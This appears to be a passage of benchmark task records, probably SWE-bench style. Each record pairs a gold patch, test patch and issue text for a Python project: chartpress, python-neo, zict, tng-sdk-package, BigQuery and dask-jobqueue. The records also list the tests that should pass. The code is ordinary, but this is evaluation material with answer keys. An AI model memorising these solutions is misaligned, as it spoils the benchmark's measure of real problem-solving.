+ image = "{repository}:{tag}".format(**value)
+ try:
+ before = parent[last_part]
+ except (KeyError, IndexError):
+ before = None
+ if before != image:
+ print(f"Updating {values_file}: {key}: {image}")
+ parent[last_part] = image
else:
raise TypeError(
- f'The key {key} in {values_file} must be a mapping.'
+ f'The key {key} in {values_file} must be a mapping or string, not {type(mod_obj)}.'
)
@@ -315,34 +396,43 @@ def build_chart(name, version=None, paths=None, long=False):
Example versions constructed:
- 0.9.0-alpha.1
- - 0.9.0-alpha.1+000.asdf1234 (--long)
- - 0.9.0-alpha.1+005.sdfg2345
- - 0.9.0-alpha.1+005.sdfg2345 (--long)
+ - 0.9.0-alpha.1.000.asdf1234 (--long)
+ - 0.9.0-alpha.1.005.sdfg2345
+ - 0.9.0-alpha.1.005.sdfg2345 (--long)
+ - 0.9.0
+ - 0.9.0-002.dfgh3456
"""
chart_file = os.path.join(name, 'Chart.yaml')
with open(chart_file) as f:
chart = yaml.load(f)
- last_chart_commit = last_modified_commit(*paths)
-
if version is None:
+ chart_commit = latest_tag_or_mod_commit(*paths, echo=False)
+
try:
- git_describe = check_output(['git', 'describe', '--tags', '--long', last_chart_commit]).decode('utf8').strip()
+ git_describe = check_output(
+ [
+ 'git', 'describe', '--tags', '--long', chart_commit
+ ],
+ echo=False,
+ ).decode('utf8').strip()
latest_tag_in_branch, n_commits, sha = git_describe.rsplit('-', maxsplit=2)
-
- n_commits = int(n_commits)
- if n_commits > 0 or long:
- version = f"{latest_tag_in_branch}+{n_commits:03d}.{sha}"
- else:
- version = f"{latest_tag_in_branch}"
+ # remove "g" prefix output by the git describe command
+ # ref: https://git-scm.com/docs/git-describe#_examples
+ sha = sha[1:]
+ version = _get_identifier(latest_tag_in_branch, n_commits, sha, long)
except subprocess.CalledProcessError:
# no tags on branch: fallback to the SemVer 2 compliant version
- # 0.0.1+<n_comits>.<last_chart_commit>
- n_commits = int(check_output(
- ['git', 'rev-list', '--count', last_chart_commit],
+ # 0.0.1-<n_commits>.<chart_commit>
+ latest_tag_in_branch = "0.0.1"
+ n_commits = check_output(
+ [
+ 'git', 'rev-list', '--count', chart_commit
+ ],
echo=False,
- ).decode('utf-8').strip())
- version = f"0.0.1+{n_commits:03d}.{last_chart_commit}"
+ ).decode('utf-8').strip()
+
+ version = _get_identifier(latest_tag_in_branch, n_commits, chart_commit, long)
chart['version'] = version
@@ -510,10 +600,7 @@ def main():
images=chart['images'],
tag=args.tag if not args.reset else chart.get('resetTag', 'set-by-chartpress'),
push=args.push,
- # chart_tag will act as a image tag prefix, we can get it from
- # the chart_version by stripping away the build part of the
- # SemVer 2 compliant chart_version.
- chart_tag=chart_version.split('+')[0],
+ chart_version=chart_version,
skip_build=args.skip_build or args.reset,
long=args.long,
)
|
jupyterhub/chartpress
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
diff --git a/tests/test_regexp.py b/tests/test_regexp.py
new file mode 100644
index 0000000..b597655
--- /dev/null
+++ b/tests/test_regexp.py
@@ -0,0 +1,14 @@
+from chartpress import _strip_identifiers_build_suffix
+from chartpress import _get_identifier
+
+def test__strip_identifiers_build_suffix():
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-005.asdf1234") == "0.1.2"
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-alpha.1.005.asdf1234") == "0.1.2-alpha.1"
+
+def test__get_identifier():
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=True) == "0.1.2-000.asdf123"
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=False) == "0.1.2"
+ assert _get_identifier(tag="0.1.2", n_commits="5", commit="asdf123", long=False) == "0.1.2-005.asdf123"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=True) == "0.1.2-alpha.1.000.asdf1234"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=False) == "0.1.2-alpha.1"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="5", commit="asdf1234", long=False) == "0.1.2-alpha.1.005.asdf1234"
|
Support images defined as string
Add support for images defined as `<registry>/<repo>:<tag>`.
Possible solutions to keep compatibility with images defined as mapping:
1. check the image value in `values.yaml`
2. if it is mapping use current way of setting the dictionary;
3. else use formatted string `"{registry}/{repo}:{tag}".format(...)`
Please let me know what you think and I will send a PR.
|
0.0
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
[
"tests/test_regexp.py::test__strip_identifiers_build_suffix",
"tests/test_regexp.py::test__get_identifier"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-10-20 17:39:35+00:00
|
bsd-3-clause
| 3,364
|
|
NeuralEnsemble__python-neo-1297
|
diff --git a/neo/io/__init__.py b/neo/io/__init__.py
index 22b6df66..4aa31692 100644
--- a/neo/io/__init__.py
+++ b/neo/io/__init__.py
@@ -451,8 +451,23 @@ def list_candidate_ios(file_or_folder, ignore_patterns=['*.ini', 'README.txt', '
# if only file prefix was provided, e.g /mydatafolder/session1-
# to select all files sharing the `session1-` prefix
elif file_or_folder.parent.exists():
- filenames = file_or_folder.parent.glob(file_or_folder.name + '*')
-
+ filenames = list(file_or_folder.parent.glob(file_or_folder.name + '*'))
+ # if filenames empty and suffix is provided then non-existent file
+ # may be written in current dir. So run check for io
+ if len(filenames)==0 and file_or_folder.suffix:
+ suffix = file_or_folder.suffix[1:].lower()
+ if suffix not in io_by_extension:
+ raise ValueError(f'{suffix} is not a supported format of any IO.')
+ return io_by_extension[suffix]
+
+ # If non-existent file in non-existent dir is given check if this
+ # structure could be created with an io writing the file
+ elif file_or_folder.suffix:
+ suffix = file_or_folder.suffix[1:].lower()
+ if suffix not in io_by_extension:
+ raise ValueError(f'{suffix} is not a supported format of any IO.')
+ return io_by_extension[suffix]
+
else:
raise ValueError(f'{file_or_folder} does not contain data files of a supported format')
|
NeuralEnsemble/python-neo
|
f608309c5ce031ecd905349c140b07a3dafb057d
|
diff --git a/neo/test/iotest/test_get_io.py b/neo/test/iotest/test_get_io.py
new file mode 100644
index 00000000..b43499b0
--- /dev/null
+++ b/neo/test/iotest/test_get_io.py
@@ -0,0 +1,41 @@
+from pathlib import Path
+from tempfile import TemporaryDirectory
+from neo.io import get_io, list_candidate_ios, NixIO
+
+
+def test_list_candidate_ios_non_existant_file():
+ # use plexon io suffix for testing here
+ non_existant_file = Path('non_existant_folder/non_existant_file.plx')
+ non_existant_file.unlink(missing_ok=True)
+ ios = list_candidate_ios(non_existant_file)
+
+ assert ios
+
+ # cleanup
+ non_existant_file.unlink(missing_ok=True)
+
+
+def test_list_candidate_ios_filename_stub():
+ # create dummy folder with dummy files
+ with TemporaryDirectory(prefix='filename_stub_test_') as test_folder:
+ test_folder = Path(test_folder)
+ test_filename = (test_folder / 'dummy_file.nix')
+ test_filename.touch()
+ filename_stub = test_filename.with_suffix('')
+
+ # check that io is found even though file suffix was not provided
+ ios = list_candidate_ios(filename_stub)
+
+ assert NixIO in ios
+
+
+def test_get_io_non_existant_file_writable_io():
+ # use nixio for testing with writable io
+ non_existant_file = Path('non_existant_file.nix')
+ non_existant_file.unlink(missing_ok=True)
+ io = get_io(non_existant_file)
+
+ assert isinstance(io, NixIO)
+
+ # cleanup
+ non_existant_file.unlink(missing_ok=True)
|
neo.get_io fails on file yet to be written
**Describe the bug**
Calling neo.get_io no longer works with the name of a file yet to be written
which means it can no longer be uses before a
io.write(... call
**To Reproduce**
import neo
neo.get_io("tobewritten.pkl")
**Expected behaviour**
return an io
**Environment:**
- OS: [e.g. macOS, Linux, Windows]
i think all but found with linux
- Python version
found with 3.11
- Neo version
0.12.0
Worked in neo 0.10
-
- NumPy version
not relevant
**Additional context**
our workaround is
def get_neo_io(file_or_folder):
try:
return neo.get_io(file_or_folder)
except ValueError as ex:
# As neo.get_io only works with existinf files
_, suffix = os.path.splitext(file_or_folder)
suffix = suffix[1:].lower()
if suffix in neo.io_by_extension:
writer_list = neo.io_by_extension[suffix]
return writer_list[0](file_or_folder)
|
0.0
|
f608309c5ce031ecd905349c140b07a3dafb057d
|
[
"neo/test/iotest/test_get_io.py::test_list_candidate_ios_non_existant_file",
"neo/test/iotest/test_get_io.py::test_get_io_non_existant_file_writable_io"
] |
[
"neo/test/iotest/test_get_io.py::test_list_candidate_ios_filename_stub"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2023-06-19 16:48:00+00:00
|
bsd-3-clause
| 397
|
|
dask__zict-64
|
diff --git a/doc/source/changelog.rst b/doc/source/changelog.rst
index 0375754..e493d3f 100644
--- a/doc/source/changelog.rst
+++ b/doc/source/changelog.rst
@@ -4,6 +4,8 @@ Changelog
2.2.0 - Unreleased
------------------
- Added type annotations (:pr:`62`) `Guido Imperiale`_
+- If you call Func.update() and Func wraps around File, do not store all dump outputs in
+ memory (:pr:`64`) `Guido Imperiale`_
2.1.0 - 2022-02-25
diff --git a/zict/common.py b/zict/common.py
index 6ed9e94..3d94a2e 100644
--- a/zict/common.py
+++ b/zict/common.py
@@ -1,6 +1,7 @@
from __future__ import annotations
from collections.abc import Iterable, Mapping
+from itertools import chain
from typing import MutableMapping # TODO move to collections.abc (needs Python >=3.9)
from typing import Any, TypeVar, overload
@@ -39,12 +40,12 @@ class ZictBase(MutableMapping[KT, VT]):
if args:
other = args[0]
if isinstance(other, Mapping) or hasattr(other, "items"):
- items += other.items()
+ items = other.items()
else:
# Assuming (key, value) pairs
- items += other
+ items = other
if kwds:
- items += kwds.items()
+ items = chain(items, kwds.items())
self._do_update(items)
def _do_update(self, items: Iterable[tuple[KT, VT]]) -> None:
|
dask/zict
|
6850845b645aea71bac342db9cafc8ed9546db4d
|
diff --git a/zict/tests/test_func.py b/zict/tests/test_func.py
index d2fbd34..5345045 100644
--- a/zict/tests/test_func.py
+++ b/zict/tests/test_func.py
@@ -1,4 +1,10 @@
+import gc
+from collections.abc import MutableMapping
+
+import pytest
+
from zict import Func
+from zict.common import ZictBase
from . import utils_test
@@ -46,3 +52,40 @@ def test_mapping():
z = Func(rotl, rotr, d)
utils_test.check_mapping(z)
utils_test.check_closing(z)
+
+
+@pytest.mark.parametrize("wrapped_cls", [MutableMapping, ZictBase])
+def test_update_descopes_early(wrapped_cls):
+ """Test that Func.update() descopes the output of self.dump as soon as it can, if
+ the wrapped mapping allows, and doesn't store everything into a list.
+ """
+
+ class Dumped:
+ n = 0
+
+ def __init__(self):
+ gc.collect() # Only necessary on pypy
+ Dumped.n += 1
+ assert Dumped.n < 3
+
+ def __del__(self):
+ Dumped.n -= 1
+
+ class Dummy(wrapped_cls):
+ def __setitem__(self, key, value):
+ pass
+
+ def __getitem__(self, key, value):
+ raise KeyError(key)
+
+ def __delitem__(self, key):
+ raise KeyError(key)
+
+ def __iter__(self):
+ return iter(())
+
+ def __len__(self):
+ return 0
+
+ d = Func(lambda v: Dumped(), lambda w: None, Dummy())
+ d.update(dict.fromkeys(range(10)))
|
Memory flare on Func.update() with File backend
Consider:
```python
d = Func(pickle.dumps, pickle.loads, File(somedir))
d.update(mydata)
```
### Current behaviour
1. call ``pickle.dumps`` on every element of mydata and store all output in memory
2. call ``File.__setitem__`` on each pickled element
3. descope the pickled data all at once
### Expected behaviour
File does not have an optimized update method, unlike LMDB or Sieve, as it does not benefit from updating everything in a single call.
Therefore, it should be possible to create a pickle buffer for every value, write it to disk, and then release it straight away.
The issue is not in Func, but actually in File.update and to be precise in ZictBase.update, which converts iterables into lists.
### Mitigation
- Instead of ``pickle.dumps``, write a function that returns a tuple of (pickle5 output, *buffers).
- If you wrap Func in a zict.Buffer, Func.update will never be called.
dask.distributed does both of the above.
|
0.0
|
6850845b645aea71bac342db9cafc8ed9546db4d
|
[
"zict/tests/test_func.py::test_update_descopes_early[ZictBase]"
] |
[
"zict/tests/test_func.py::test_simple",
"zict/tests/test_func.py::test_mapping",
"zict/tests/test_func.py::test_update_descopes_early[MutableMapping]"
] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-03-07 14:38:44+00:00
|
bsd-3-clause
| 1,807
|
|
sonata-nfv__tng-sdk-package-16
|
diff --git a/src/tngsdk/package/__init__.py b/src/tngsdk/package/__init__.py
index 82cd398..c3e1fb3 100755
--- a/src/tngsdk/package/__init__.py
+++ b/src/tngsdk/package/__init__.py
@@ -30,6 +30,36 @@
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.5gtango.eu).
+import logging
+import coloredlogs
+import os
+
+from tngsdk.package.cli import parse_args, CLI
+from tngsdk.package.pkgmgm import Packager
+
+
+LOG = logging.getLogger(os.path.basename(__file__))
+
+
+def logging_setup():
+ os.environ["COLOREDLOGS_LOG_FORMAT"] \
+ = "%(asctime)s [%(levelname)s] [%(name)s] %(message)s"
+
def main():
- print("not implemented")
+ logging_setup()
+ args = parse_args()
+ # TODO better log configuration (e.g. file-based logging)
+ if args.verbose:
+ coloredlogs.install(level="DEBUG")
+ else:
+ coloredlogs.install(level="INFO")
+ # TODO validate if args combination makes any sense
+ p = Packager(args)
+ if args.service:
+ # TODO start package in service mode
+ pass
+ else:
+ # run package in CLI mode
+ c = CLI(args, p)
+ c.dispatch()
diff --git a/src/tngsdk/package/cli.py b/src/tngsdk/package/cli.py
new file mode 100644
index 0000000..88928c0
--- /dev/null
+++ b/src/tngsdk/package/cli.py
@@ -0,0 +1,119 @@
+# Copyright (c) 2015 SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# ALL RIGHTS RESERVED.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Neither the name of the SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# nor the names of its contributors may be used to endorse or promote
+# products derived from this software without specific prior written
+# permission.
+#
+# This work has been performed in the framework of the SONATA project,
+# funded by the European Commission under Grant number 671517 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.sonata-nfv.eu).
+#
+# This work has also been performed in the framework of the 5GTANGO project,
+# funded by the European Commission under Grant number 761493 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.5gtango.eu).
+import logging
+import argparse
+import os
+import sys
+
+
+LOG = logging.getLogger(os.path.basename(__file__))
+
+
+class CLI(object):
+
+ def __init__(self, args, packager):
+ self._args = args
+ self._p = packager
+
+ def dispatch(self):
+ if self._args.package:
+ # package creation
+ self._p.package()
+ else:
+ # un-packaging
+ self._p.unpackage()
+
+
+def parse_args(input_args=None):
+ parser = argparse.ArgumentParser(
+ description="5GTANGO SDK packager")
+
+ parser.add_argument(
+ "-p",
+ "--package",
+ help="Create package from given project.",
+ required=False,
+ default=None,
+ dest="package")
+
+ parser.add_argument(
+ "-u",
+ "--unpackage",
+ help="Unpackage given package.",
+ required=False,
+ default=None,
+ dest="unpackage")
+
+ parser.add_argument(
+ "--format",
+ help="Package format [5GTANGO|OSM]."
+ + "\nDefault: 5GTANGO",
+ required=False,
+ default="5GTANGO",
+ dest="format")
+
+ parser.add_argument(
+ "-v",
+ "--verbose",
+ help="Output debug messages.",
+ required=False,
+ default=False,
+ dest="verbose",
+ action="store_true")
+
+ parser.add_argument(
+ "-s",
+ "--service",
+ help="Run packager in service mode with REST API.",
+ required=False,
+ default=False,
+ dest="service",
+ action="store_true")
+
+ parser.add_argument(
+ "--address",
+ help="Listen address of REST API when in service mode."
+ + "\nDefault: 0.0.0.0",
+ required=False,
+ default="0.0.0.0",
+ dest="service_address")
+
+ parser.add_argument(
+ "--port",
+ help="TCP port of REST API when in service mode."
+ + "\nDefault: 5099",
+ required=False,
+ default=5099,
+ dest="service_port")
+ if input_args is None:
+ input_args = sys.argv[1:]
+ return parser.parse_args(input_args)
diff --git a/src/tngsdk/package/pkgmgm.py b/src/tngsdk/package/pkgmgm.py
new file mode 100644
index 0000000..f40ac40
--- /dev/null
+++ b/src/tngsdk/package/pkgmgm.py
@@ -0,0 +1,48 @@
+# Copyright (c) 2018 SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# ALL RIGHTS RESERVED.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Neither the name of the SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# nor the names of its contributors may be used to endorse or promote
+# products derived from this software without specific prior written
+# permission.
+#
+# This work has been performed in the framework of the SONATA project,
+# funded by the European Commission under Grant number 671517 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.sonata-nfv.eu).
+#
+# This work has also been performed in the framework of the 5GTANGO project,
+# funded by the European Commission under Grant number 761493 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.5gtango.eu).
+import logging
+import os
+
+
+LOG = logging.getLogger(os.path.basename(__file__))
+
+
+class Packager(object):
+
+ def __init__(self, args):
+ self._args = args
+
+ def package(self):
+ LOG.warning("packaging not implemented")
+
+ def unpackage(self):
+ LOG.warning("unpackaging not implemented")
|
sonata-nfv/tng-sdk-package
|
ff3c5eeee949fc5b3a379d1bbb753f6e24fb0991
|
diff --git a/src/tngsdk/package/tests/test_unit_package.py b/src/tngsdk/package/rest.py
old mode 100755
new mode 100644
similarity index 92%
rename from src/tngsdk/package/tests/test_unit_package.py
rename to src/tngsdk/package/rest.py
index 1c80e24..49a747d
--- a/src/tngsdk/package/tests/test_unit_package.py
+++ b/src/tngsdk/package/rest.py
@@ -29,12 +29,3 @@
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.5gtango.eu).
-
-
-import unittest
-
-
-class TngSdkPackageTest(unittest.TestCase):
-
- def test_test(self):
- self.assertTrue(True)
diff --git a/src/tngsdk/package/tests/test_unit_pkgmgm.py b/src/tngsdk/package/tests/test_unit_pkgmgm.py
new file mode 100755
index 0000000..53d79ab
--- /dev/null
+++ b/src/tngsdk/package/tests/test_unit_pkgmgm.py
@@ -0,0 +1,58 @@
+# Copyright (c) 2015 SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# ALL RIGHTS RESERVED.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Neither the name of the SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# nor the names of its contributors may be used to endorse or promote
+# products derived from this software without specific prior written
+# permission.
+#
+# This work has been performed in the framework of the SONATA project,
+# funded by the European Commission under Grant number 671517 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.sonata-nfv.eu).
+#
+# This work has also been performed in the framework of the 5GTANGO project,
+# funded by the European Commission under Grant number 761493 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.5gtango.eu).
+
+
+import unittest
+from tngsdk.package.cli import parse_args
+from tngsdk.package.pkgmgm import Packager
+
+
+class TngSdkPkgMgmTest(unittest.TestCase):
+
+ def setUp(self):
+ # list can manually define CLI arguments
+ self.args = parse_args([])
+
+ def tearDown(self):
+ pass
+
+ def test_instantiation(self):
+ p = Packager(self.args)
+ del p
+
+ def test_package(self):
+ p = Packager(self.args)
+ p.package()
+
+ def test_unpackage(self):
+ p = Packager(self.args)
+ p.unpackage()
|
Add basic command line interface
#Example:
```
tng-package -h
usage: tng-package [-h] [-p PACKAGE] [-u UNPACKAGE] [--format FORMAT] [-v]
[-s] [--address SERVICE_PORT] [--port SERVICE_PORT]
5GTANGO SDK packager
optional arguments:
-h, --help show this help message and exit
-p PACKAGE, --package PACKAGE
Create package from given project.
-u UNPACKAGE, --unpackage UNPACKAGE
Unpackage given package.
--format FORMAT Package format [5GTANGO|OSM]. Default: 5GTANGO
-v, --verbose Output debug messages.
-s, --service Run packager in service mode with REST API.
--address SERVICE_PORT
Listen address of REST API when in service mode.
Default: 0.0.0.0
--port SERVICE_PORT TCP port of REST API when in service mode. Default:
5099
```
|
0.0
|
ff3c5eeee949fc5b3a379d1bbb753f6e24fb0991
|
[
"src/tngsdk/package/tests/test_unit_pkgmgm.py::TngSdkPkgMgmTest::test_instantiation",
"src/tngsdk/package/tests/test_unit_pkgmgm.py::TngSdkPkgMgmTest::test_package",
"src/tngsdk/package/tests/test_unit_pkgmgm.py::TngSdkPkgMgmTest::test_unpackage"
] |
[] |
{
"failed_lite_validators": [
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-02-13 13:10:35+00:00
|
apache-2.0
| 5,600
|
|
googleapis__python-bigquery-66
|
diff --git a/google/cloud/bigquery/model.py b/google/cloud/bigquery/model.py
index d39ec5f2..a2510e86 100644
--- a/google/cloud/bigquery/model.py
+++ b/google/cloud/bigquery/model.py
@@ -430,6 +430,6 @@ class ModelReference(object):
return hash(self._key())
def __repr__(self):
- return "ModelReference(project='{}', dataset_id='{}', project_id='{}')".format(
+ return "ModelReference(project_id='{}', dataset_id='{}', model_id='{}')".format(
self.project, self.dataset_id, self.model_id
)
|
googleapis/python-bigquery
|
2abdef82bed31601d1ca1aa92a10fea1e09f5297
|
diff --git a/tests/unit/model/test_model.py b/tests/unit/model/test_model.py
index bbb93ef9..90fc09e6 100644
--- a/tests/unit/model/test_model.py
+++ b/tests/unit/model/test_model.py
@@ -316,5 +316,5 @@ def test_repr(target_class):
got = repr(model)
assert got == (
"Model(reference=ModelReference("
- "project='my-proj', dataset_id='my_dset', project_id='my_model'))"
+ "project_id='my-proj', dataset_id='my_dset', model_id='my_model'))"
)
diff --git a/tests/unit/model/test_model_reference.py b/tests/unit/model/test_model_reference.py
index ff1d1df7..39dabb55 100644
--- a/tests/unit/model/test_model_reference.py
+++ b/tests/unit/model/test_model_reference.py
@@ -136,5 +136,5 @@ def test_repr(target_class):
got = repr(model)
assert (
got
- == "ModelReference(project='my-proj', dataset_id='my_dset', project_id='my_model')"
+ == "ModelReference(project_id='my-proj', dataset_id='my_dset', model_id='my_model')"
)
|
Bigquery: Model reference repr seems wrong for model_id
For `ModelReference`'s repr use project_id against model_id
https://github.com/googleapis/python-bigquery/blob/be5c8b1ede9a2d762fd5574c32587d125eca4713/google/cloud/bigquery/model.py#L432-L435
|
0.0
|
2abdef82bed31601d1ca1aa92a10fea1e09f5297
|
[
"tests/unit/model/test_model.py::test_repr",
"tests/unit/model/test_model_reference.py::test_repr"
] |
[
"tests/unit/model/test_model.py::test_ctor",
"tests/unit/model/test_model.py::test_ctor_string",
"tests/unit/model/test_model.py::test_from_api_repr",
"tests/unit/model/test_model.py::test_from_api_repr_w_minimal_resource",
"tests/unit/model/test_model.py::test_from_api_repr_w_unknown_fields",
"tests/unit/model/test_model.py::test_build_resource[resource0-filter_fields0-expected0]",
"tests/unit/model/test_model.py::test_build_resource[resource1-filter_fields1-expected1]",
"tests/unit/model/test_model.py::test_build_resource[resource2-filter_fields2-expected2]",
"tests/unit/model/test_model.py::test_build_resource[resource3-filter_fields3-expected3]",
"tests/unit/model/test_model.py::test_build_resource[resource4-filter_fields4-expected4]",
"tests/unit/model/test_model.py::test_build_resource[resource5-filter_fields5-expected5]",
"tests/unit/model/test_model.py::test_set_description",
"tests/unit/model/test_model.py::test_set_expires",
"tests/unit/model/test_model.py::test_set_friendly_name",
"tests/unit/model/test_model.py::test_set_labels",
"tests/unit/model/test_model.py::test_replace_labels",
"tests/unit/model/test_model.py::test_set_encryption_configuration",
"tests/unit/model/test_model_reference.py::test_from_api_repr",
"tests/unit/model/test_model_reference.py::test_from_api_repr_w_unknown_fields",
"tests/unit/model/test_model_reference.py::test_to_api_repr",
"tests/unit/model/test_model_reference.py::test_from_string",
"tests/unit/model/test_model_reference.py::test_from_string_legacy_string",
"tests/unit/model/test_model_reference.py::test_from_string_not_fully_qualified",
"tests/unit/model/test_model_reference.py::test_from_string_with_default_project",
"tests/unit/model/test_model_reference.py::test_from_string_ignores_default_project",
"tests/unit/model/test_model_reference.py::test_eq",
"tests/unit/model/test_model_reference.py::test_hash"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-03-24 14:59:08+00:00
|
apache-2.0
| 2,622
|
|
dask__dask-jobqueue-563
|
diff --git a/dask_jobqueue/htcondor.py b/dask_jobqueue/htcondor.py
index fb7b0be..18fc74e 100644
--- a/dask_jobqueue/htcondor.py
+++ b/dask_jobqueue/htcondor.py
@@ -16,7 +16,6 @@ class HTCondorJob(Job):
%(job_header)s
-Environment = "%(quoted_environment)s"
Arguments = "%(quoted_arguments)s"
Executable = %(executable)s
@@ -67,7 +66,14 @@ Queue
env_extra = dask.config.get(
"jobqueue.%s.env-extra" % self.config_name, default=[]
)
- self.env_dict = self.env_lines_to_dict(env_extra)
+
+ if env_extra is not None:
+ # Overwrite command template: prepend commands from env_extra separated by semicolon.
+ # This is special for HTCondor, because lines to execute on the worker node cannot be
+ # simply added to the submit script like for other batch systems.
+ self._command_template = (
+ "; ".join(env_extra) + "; " + self._command_template
+ )
self.job_header_dict = {
"MY.DaskWorkerName": '"htcondor--$F(MY.JobId)--"',
@@ -118,31 +124,15 @@ Queue
+ " ".join(shlex.quote(arg) for arg in cancel_command_extra)
)
- def env_lines_to_dict(self, env_lines):
- """Convert an array of export statements (what we get from env-extra
- in the config) into a dict"""
- env_dict = {}
- for env_line in env_lines:
- split_env_line = shlex.split(env_line)
- if split_env_line[0] == "export":
- split_env_line = split_env_line[1:]
- for item in split_env_line:
- if "=" in item:
- k, v = item.split("=", 1)
- env_dict[k] = v
- return env_dict
-
def job_script(self):
"""Construct a job submission script"""
quoted_arguments = quote_arguments(["-c", self._command_template])
- quoted_environment = quote_environment(self.env_dict)
job_header_lines = "\n".join(
"%s = %s" % (k, v) for k, v in self.job_header_dict.items()
)
return self._script_template % {
"shebang": self.shebang,
"job_header": job_header_lines,
- "quoted_environment": quoted_environment,
"quoted_arguments": quoted_arguments,
"executable": self.executable,
}
@@ -260,6 +250,17 @@ class HTCondorCluster(JobQueueCluster):
This also works with adaptive clusters. This automatically launches and kill workers based on load.
>>> cluster.adapt(maximum_jobs=20)
+
+ If setup commands need to be run before starting the worker on the worker node, ``env_extra`` can be used,
+ e.g., to activate a virtual environment:
+
+ >>> from dask_jobqueue.htcondor import HTCondorCluster
+ >>> cluster = HTCondorCluster(cores=1, memory="2GB", disk="4GB",
+ env_extra=['cd /some/path/', 'source venv/bin/activate'])
+
+ Note that environment variables are no longer passed via the ``Environment`` parameter in the submit
+ description file. If you explictly want to set that, you need to use ``job_extra``.
+
""".format(
job=job_parameters, cluster=cluster_parameters
)
diff --git a/docs/source/advanced-tips-and-tricks.rst b/docs/source/advanced-tips-and-tricks.rst
index bd79810..237adc6 100644
--- a/docs/source/advanced-tips-and-tricks.rst
+++ b/docs/source/advanced-tips-and-tricks.rst
@@ -68,6 +68,36 @@ accepted option on some SLURM clusters. The error was something like this:
sbatch: error: Memory specification can not be satisfied
sbatch: error: Batch job submission failed: Requested node configuration is not available
+Run setup commands before starting the worker with ``env_extra``
+----------------------------------------------------------------
+
+Sometimes you need to run some setup commands before the actual worker can be started. This includes
+setting environment variables, loading environment modules, sourcing/activating a virtual environment,
+or activating conda/mamba environments.
+
+This can be achieved using the ``env_extra`` parameter. Example for setting up a virtual environment:
+
+.. code-block:: python
+
+ from dask_jobqueue.htcondor import HTCondorCluster
+ env_extra = ['cd /some/path', 'source venv/bin/activate']
+ cluster = HTCondorCluster(cores=1, memory="2GB", disk="4GB", log_directory = 'logs', python='python3',
+ env_extra=env_extra)
+ print(cluster.job_script())
+
+For ``HTCondorCluster``, the commands will be prepended to the actual python call in the ``Arguments``
+parameter in the submit description file. The relevant lines will look like this:
+
+.. code-block:: text
+
+ ...
+ Arguments = "-c 'cd /some/path; source venv/bin/activate; python3 -m distributed.cli.dask_worker tcp://<IP>:<PORT> --nthreads 1 --memory-limit 2.00GB --name dummy-name --nanny --death-timeout 60'"
+ Executable = /bin/sh
+ ...
+
+For other batch systems (``*Cluster`` classes) the additional commands will be inserted as separate lines
+in the submission script.
+
How to handle job queueing system walltime killing workers
----------------------------------------------------------
diff --git a/docs/source/examples.rst b/docs/source/examples.rst
index ad02971..4f9a382 100644
--- a/docs/source/examples.rst
+++ b/docs/source/examples.rst
@@ -32,7 +32,7 @@ PBS Deployments
interface='ib0')
Moab Deployments
-~~~~~~~~~~~~~~~~
+----------------
On systems which use the Moab Workload Manager, a subclass of ``PBSCluster``
